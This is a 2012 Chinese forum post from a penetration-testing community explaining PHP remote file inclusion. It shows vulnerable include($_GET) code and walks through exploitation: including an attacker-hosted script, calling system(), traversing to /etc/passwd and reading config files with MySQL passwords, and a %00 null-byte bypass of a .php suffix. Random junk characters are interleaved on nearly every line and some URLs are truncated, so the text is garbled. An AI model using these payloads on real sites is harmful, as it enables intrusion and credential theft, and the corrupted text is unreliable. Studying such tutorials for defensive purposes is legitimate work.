中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含

  }* |1 b7 v1 s$ T7 K" Ophp远端档包含漏洞基本
+ E6 `) V# o0 I这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。7 ^1 k& d0 b: j+ J8 T9 P0 p1 h
本帖隐藏的内容需要回复才可以浏览" p" o1 f6 L+ `- ]8 Q5 M1 j1 b
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。/ a: C7 D3 m7 n- Y5 x
1.找出bug:
1 a% x8 y( e/ ^* k0 ^/ v为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:3 _) k6 |  ^2 ]# r% C; N
如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。& Q3 h7 Z. a4 N( y! s! g3 K9 t
我们先看这个,当用户输入通过后就包含档,也就是
6 h  k9 G3 ~) I6 Q- g. |, O* Eif ($_GET) {
0 U. Z5 n1 Q2 L8 o9 X/ U" C  }include $_GET;; b6 Z4 q( I/ y5 k; @% Y
} else {* j! `) I( v' u# t; e7 ~
include "home.php";
0 p! L7 T. k: h7 V$ m( l6 A+ d}( L, Z' b+ O' N$ q  r
这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。( l8 ~: i. C8 L0 t
2.测试
) [+ N$ h; C0 j. m; B9 p, M这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
5 i1 \  J- C' ~4 \' m- w8 Y4 U3 [http://www.target.com/explame.php?page=zizzy
+ A- f" L6 I. }; e, n/ [9 q4 c) F+ JWarning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 32 a. b2 V' o9 Z) x# K$ Y" Q
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3; `8 b. \) i" B. t( G
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。
7 P  |' S5 u' }# a* j' J( P" t3.利用
' _* E( \  y' y/ I7 e( o) o! H1 ?php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样4 O7 D5 D* d/ C5 P. w
<?' W/ J5 C6 t# u) O: k7 q( }  L
echo "Wow,test!";
  Y7 F; `1 O3 E" `" I2 r2 c! E" h8 R?>
  \7 L% k" A  _, f# j' a那么http://www.target.com/explame.php?pa...e.com/yeah.txt! l7 F* E7 ]: w  q+ f' {
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
0 V! u( `$ ~( o$ X" `6 m- y4.另一种
9 J( y4 _7 U' K  _0 x有时程式师换种写法,写成这样,限制了包含范围
  C  g4 m" X- N8 ?; Vif ($_GET) {
7 ]! K) h" R& C5 u$ g2 n5 Q* i% J$ Vinclude "$_GET.php";9 m$ B8 C/ p( R/ \: C) B* P1 |6 Y
} else {# }3 H; R' e9 X+ [
include "home.php";
2 c4 W- W5 H! l' Z* y}  b" K+ U+ J4 G# ]8 L
我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt4 b/ j6 T# r0 E0 J0 Z
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
* O2 x% R2 `4 K6 CWarning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3  ]4 x. _# P4 _
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
: {. h! H: \! p& C) o: N那passwd怎么办& u0 ^* z1 `8 D' O" N
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 33 g( M& ?1 l+ j4 W  a- }* |
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
) ~: {$ |! q' b( Z9 L在这里使用个NUL字元,也就是%00来跳过检测
% J+ \! W7 }3 f& Khttp://www.target.com/explame.php?pa.../etc/passwd%00 : O$ m# u% o8 V. x- j; o% u




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2